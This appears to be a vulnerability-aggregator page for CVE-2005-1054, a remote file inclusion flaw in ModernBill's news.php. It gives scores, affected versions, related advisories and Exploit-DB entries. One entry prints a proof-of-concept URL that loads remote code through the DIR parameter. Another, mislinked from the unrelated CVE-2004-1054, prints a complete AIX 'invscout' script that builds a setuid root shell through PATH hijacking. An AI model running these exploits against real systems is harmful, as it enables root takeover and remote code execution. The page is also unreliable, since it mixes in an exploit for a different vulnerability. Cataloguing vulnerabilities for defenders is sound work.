CVE-2005-1054
published 2005-05-02CVE-2005-1054: PHP remote file inclusion vulnerability in news.php in ModernBill 4.3.0 and earlier allows remote attackers to execute arbitrary PHP code by modifying the DIR…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.51%
87.7th percentile
PHP remote file inclusion vulnerability in news.php in ModernBill 4.3.0 and earlier allows remote attackers to execute arbitrary PHP code by modifying the DIR parameter to reference a URL on a remote web server that contains the code.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| modernbill | modernbill | <= 4.4 | — |
| modernbill | modernbill | <= 4.4.0 | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| modernbill | modernbill | — | — |
| moderngigabyte | modernbill | <= 4.3.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-xgj6-g3gm-24hv: Multiple PHP remote file inclusion vulnerabilities in ModernBill 4
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2008-5060 [HIGH] CWE-94 GHSA-xgj6-g3gm-24hv: Multiple PHP remote file inclusion vulnerabilities in ModernBill 4
Multiple PHP remote file inclusion vulnerabilities in ModernBill 4.4 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the DIR parameter to (1) export_batch.inc.php, (2) run_auto_suspend.cron.php, and (3) send_email_cache.php in include/scripts/; (4) include/misc/mod_2checkout/2checkout_return.inc.php; and (5) include/html/nettools.popup.php, different vectors than CVE-2006-4034 and CVE-2005-1054.
GHSA
GHSA-vccv-grq4-wqq8: PHP remote file inclusion vulnerability in news
ghsa_unreviewed·2022-05-01
CVE-2005-1054 [HIGH] GHSA-vccv-grq4-wqq8: PHP remote file inclusion vulnerability in news
PHP remote file inclusion vulnerability in news.php in ModernBill 4.3.0 and earlier allows remote attackers to execute arbitrary PHP code by modifying the DIR parameter to reference a URL on a remote web server that contains the code.
No detection rules found.
Exploit-DB
ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion
exploitdb·2005-04-10
CVE-2005-1054 ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion
ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion
---
source: https://www.securityfocus.com/bid/13086/info
ModernBill is prone to a remote file include vulnerability.
The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'news.php' script.
ModernBill 4.3 and prior versions are vulnerable to this issue.
http://www.example.com/samples/news.php?DIR=http://www.example.com/
Exploit-DB
AIX 5.3.0 - 'invscout' Local Command Execution
exploitdb·2005-03-25
CVE-2004-1054 AIX 5.3.0 - 'invscout' Local Command Execution
AIX 5.3.0 - 'invscout' Local Command Execution
---
#!/usr/bin/sh
# r00t exploit written for the invscout bug reported by Idefense labs
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
# coded by ri0t exploitation is trivial but automated with this script
# www.ri0tnet.net
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit
cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh
# milw0rm.com [2005-03-25]
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111323741032183&w=2http://secunia.com/advisories/14890http://securitytracker.com/id?1013672http://www.gulftech.org/?node=research&article_id=00067-04102005http://www.osvdb.org/15427https://exchange.xforce.ibmcloud.com/vulnerabilities/20036http://marc.info/?l=bugtraq&m=111323741032183&w=2http://secunia.com/advisories/14890http://securitytracker.com/id?1013672http://www.gulftech.org/?node=research&article_id=00067-04102005http://www.osvdb.org/15427https://exchange.xforce.ibmcloud.com/vulnerabilities/20036
2005-05-02
Published